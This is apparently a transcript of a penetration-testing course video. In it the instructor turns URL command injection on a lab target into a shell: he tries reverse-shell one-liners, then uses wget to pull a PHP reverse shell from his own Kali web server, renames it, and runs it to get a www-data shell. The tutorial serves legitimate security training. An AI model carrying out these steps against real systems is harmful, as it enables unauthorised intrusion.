Time
14 hours 43 minutes
Difficulty
Advanced
CEU/CPE
15

Video Transcription

00:00
Hello, everybody, and welcome to episode number 44 of the Penetration Testing Simulation module. Spock Shin,
00:09
My name is Alejandro Guinea, and I'll be the instructor for today's session.
00:13
The learning objectives of this session are to understand the main steps you need to follow during a penetration testing process and to apply the techniques to successfully perform a penetration test. So let's get down to business, shall we?
00:27
So, in the previous session, we learned that we could actually, you know,
00:34
execute commands through this URL.
00:39
So as you can see, we were just listing things here. Like, maybe if I add that -a,
00:46
it will give us more options. And yeah, it will print these additional options. So, yeah, we can actually execute commands, so we can go the easy way and, you know, try to actually, uh,
00:58
throw a reverse shell
01:00
all in one. I know this seems like a bit of a stretch, but believe me, I have used this technique several times before. And if this doesn't work, we can always try other ways, other commands, to send us back a reverse shell. We saw these commands in a previous video as well.
01:19
Uh, well, you know, it's called reverse shells.
01:22
So, yeah, you can go back and see what other commands there are and how we, you know, actually learned that this could work. So we just introduce the IP and the port, and let me just start a listener over here,
01:38
and let's just execute this to see if we actually get a reverse shell. It is not throwing an exception, but as you can see, we're not actually getting anything back. We can always try the encoded version,
01:49
which is just, you know, a version that will work in URLs.
01:55
So, yeah, that's something we can actually try. Let me just copy-paste the command in here.
02:01
And, you know, instead of this
02:05
it's this.
02:06
And you know, it didn't fail, but it didn't work either. So, for example, uh,
02:14
let's see if piping is actually available. Like, for example, trying to
02:20
eliminate this
02:21
and maybe try to list, ah, common Python, um,
02:25
locations:
02:28
/bin, oops,
02:30
/bin, and maybe
02:31
everything that says p-y-t.
02:37
And yeah, it's available. You can see all the folders that contain that criteria. So maybe we can try to execute the Python command to actually get us a reverse shell. I'm just copy-pasting all of this, but, you know, we saw how to get these commands before in another video. So
02:54
if you have any questions about this, you can always go back
02:59
and see if you can actually get these commands by yourself. So again, just the IP, the port, you know, execute it. And it didn't fail. But again, no luck. No reverse shell at all. Um,
03:14
we can always just see here. Let's try the, you know, encoded version as well. Uh, I know it sounds boring to you, but this is something you will have to do in your actual penetration testing. Some commands will work and some will not,
03:30
and some techniques will work and some will not. But don't give up. Don't give up hope, okay?
03:37
So piping didn't work. That's kind of a bummer. Ah, but what about Perl? We can just check if Perl is installed.
03:46
Yeah, it's installed. That's good news. We have another try here. Uh, let me just again copy-paste the Perl command, which is kind of similar to the Python command. But let me just copy-paste that in here and actually execute it, and, you know, it worked. It seems at least it's not failing.
04:04
But it's not showing me any useful information. It is not, you know, for sure it's not
04:11
sending me back any reverse shell. You know, again, let me just try the encoded version of this command again. A lot of weird characters, you know,
04:21
it'll work.
04:24
And as I told you before, this has proved to work for me before. Uh, you know, maybe I'm just using a different... maybe the encoded version I'm using is not working. Maybe, you know, you can use another encoder
04:40
and see if that works for you. You know, you have to try everything that you can possibly think of.
04:45
Ah, but, you know, let's just run the ls command again.
04:50
Sorry, let me just copy-paste it in here
04:54
again.
04:58
And, as you can see there, there's a PHP file in here, the one that we were using, you know, and we were listing before. So that makes me think: if I can actually execute commands, can I actually execute, like, I don't know, a command, you know, a
05:13
maybe a wget command, to see if I can actually download a reverse PHP file? Let me just try it out. wget --help.
05:28
And yeah, wget is actually installed and sending me this output, but all I wanted to know was whether wget is actually present in, you know, in this system. So it is. So now there's support for wget, and we can actually see a PHP file
05:47
in that location, in my, you know... that means that I can actually drop
05:51
a PHP file in that case. So, as you can remember from the previous videos, again, if you have any questions about all that I'm using now, which I already mentioned in previous videos, you can just go back if you have any further questions.
06:12
So, for example, let me just go through this so you can see what I'm talking about.
06:15
Um, /usr/share/webshells/
06:18
um, php.
06:21
And we have a couple of them. Like, for example, we can just cat php-
06:28
reverse-shell, and you can see that it will, you know... the code doesn't matter, but it tells us that we have to change these values in order to actually get a reverse shell. Obviously, this will work because the PHP is executed at the server side. So, you know,
06:46
this localhost IP will not work. So let me just copy that first
06:48
to my web root. So, you know, I can actually
06:54
get it from the victim's machine, back to my web server.
06:58
So I use cp that from here.
07:00
Uh,
07:01
cp .
07:04
to my
07:05
web root directory again.
07:08
Maybe
07:10
rvs.php, and then change cat for cp, for copy, and then modify this reverse shell so I can actually change the IP and everything.
07:25
And I go here and I change the IP back to my listener machine,
07:31
in this case, Kali,
07:35
and I keep... oops, go back and set it to port 4444. And that's it. I set it, and, you know, I have to download this in our victim's machine. Uh, so
07:50
you know, what if I wget the PHP? This might not get the results I'm looking for, because it will be executed. But I need to copy it first. So maybe I can, you know, change the extension of that. Let me just... let me move it
08:11
to, you know, the same location.
08:18
Let me see if I did it correctly
08:26
and yeah, it seems that it is working. The thing is that I want to actually copy the code, not copy the PHP file. Because if I try to copy the PHP file, there might be a problem, because it will be executed at the same time. So yeah, copy the .txt file and then just again change the extension, just as I did in this command. So
08:46
now that I have it ready, I can just go to my web page
08:50
and wget that to the directory. So wget http://
08:56
my Kali
08:58
and then /rvs.txt. And it didn't fail. Let me just double-check that it's actually there.
09:09
Oh, no, it's not actually there. Could I actually reach it from my machine? Let me just check it out.
09:15
Maybe my... might my Apache service actually be down?
09:20
Yeah, it's actually down. Let me just start the service.
09:22
And this happens all the time, you guys. Don't worry about it if you, you know, make those silly mistakes. It's okay. If I go back here again, and if I check it out, okay, it's working.
09:37
Uh, let me just execute this again
09:43
and ls again and see if it's actually written in there. In there you are: rvs.txt. And right now, I just have to actually again use the move command and just, you know, change from rvs.txt to rvs
10:01
.php
10:05
and ls that and see if it actually worked.
10:09
And there it is, rvs.php. So now that I have
10:15
a PHP reverse shell, I can actually just start a listener. Ah, and you know,
10:20
I just... I already did, just to show you, and, you know, I'm just going to erase all this at the end. You know, I already uploaded a full PHP web shell,
10:31
and type rvs.php.
10:35
And as you can see, it's actually just loading, and at the end, yeah, it actually executed a full reverse shell. As you can see, I have a full reverse shell now. Now, whoami... I'm www-data,
10:52
okay, you know, stuff like that. The point is that I have a full low-privilege shell, and right now I need to actually elevate privileges so I can, you know, get full control of the machine.
11:07
What is performed by the command bash -i? The rest of the command is actually used to throw you a reverse shell using bash. So if netcat or Perl or Python or PHP is not present in the victim's system, you can always use the bash script or command
11:26
to actually send your reverse shell.
11:28
Ah, what is performed by the command perl -v? It's just to check out what Perl version is installed, you know, on your system or on your victim's system. It will just show you the Perl version that's actually installed.
11:43
In this video, we learned one important step you have to perform during your penetration testing process,
11:50
and we applied some techniques that will help us perform our penetration testing successfully.
11:56
Ah, you know, again, supplemental materials: Advanced Penetration Testing: Hacking the World's Most Secure Networks is a good book for you guys, a really excellent book. And looking forward to the next video, we'll cover the privilege escalation part of, you know, this Penetration Testing Simulation module we're checking right now,
12:16
so that's it for today, folks. I hope you enjoyed the video, and talk to you soon.

Instructed By

Alejandro Guinea
CERT Regional Director
Instructor